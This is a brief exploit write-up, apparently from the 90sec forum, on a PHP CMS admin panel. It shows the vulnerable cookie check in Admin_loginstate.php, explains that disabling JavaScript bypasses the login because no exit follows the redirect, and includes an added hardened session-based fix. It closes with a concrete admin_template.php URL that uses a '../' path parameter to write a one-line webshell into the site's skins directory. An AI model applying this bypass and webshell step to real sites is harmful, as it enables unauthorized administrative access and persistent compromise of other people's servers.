Author: z2681
From: 90sec
Admin_loginstate.php, in the admin directory, is the vulnerable file.
<?php
// Admin login-state check; every value is read from client-supplied cookies.
if (empty($_COOKIE['s_AdminID'])) {
    echo "<script>window.location='admin_login.php'</script>";
    exit;
}
elseif ($_COOKIE['s_Login'] != md5($_COOKIE['s_AdminID'] . $_COOKIE['s_AdminUserName'] . $_COOKIE['s_AdminPassWord'] . $_COOKIE['s_Permission'])) {
    // Only a JavaScript redirect is sent here; there is no exit.
    echo "<script>window.parent.location='admin_login.php'</script>";
}
?>
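It is easy to see that this cookie verification can be bypassed simply by disabling JavaScript, which lets us enter the admin backend directly: when the hash comparison fails, the script only emits a JavaScript redirect and never calls exit, so the rest of the page still runs.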
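A hardened form of this check, as an added example that is not part of the original post or the application's own code. It assumes the login page stores the admin id in `$_SESSION['admin_id']` after verifying the password; `is_admin_authenticated()` and `require_admin()` are hypothetical helper names.

```php
<?php
// Added example: hardened replacement for the admin login-state check.
// Assumption: admin_login.php sets $_SESSION['admin_id'] (an integer)
// only after the password has been verified on the server.

function is_admin_authenticated(array $session): bool
{
    // Trust only server-side session state; nothing here is derived
    // from values the browser can set, such as cookies.
    return isset($session['admin_id'])
        && is_int($session['admin_id'])
        && $session['admin_id'] > 0;
}

function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start([
            'cookie_httponly' => true,      // session id not readable from script
            'cookie_samesite' => 'Strict',  // not sent on cross-site requests
            'use_strict_mode' => true,      // reject uninitialized session ids
        ]);
    }
    if (!is_admin_authenticated($_SESSION)) {
        // Server-side redirect, then stop. Every failure path must end
        // the request so no admin code runs for an unauthenticated client.
        header('Location: admin_login.php', true, 302);
        exit;
    }
}

require_admin();
// ... admin page code runs only past this point ...
```

Unlike the original check, the redirect does not depend on the client executing JavaScript, and both failure cases terminate the request.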
Once in the admin backend, here is a brief note on how to get a shell.
/Admin/admin_template.php?Action=templist&path=../skins/index/html/&tempname=default template&file=qingshen.php90
You can access this URL directly and write a one-sentence (one-line) webshell. The file is of course written under the /skins/index/html/ directory.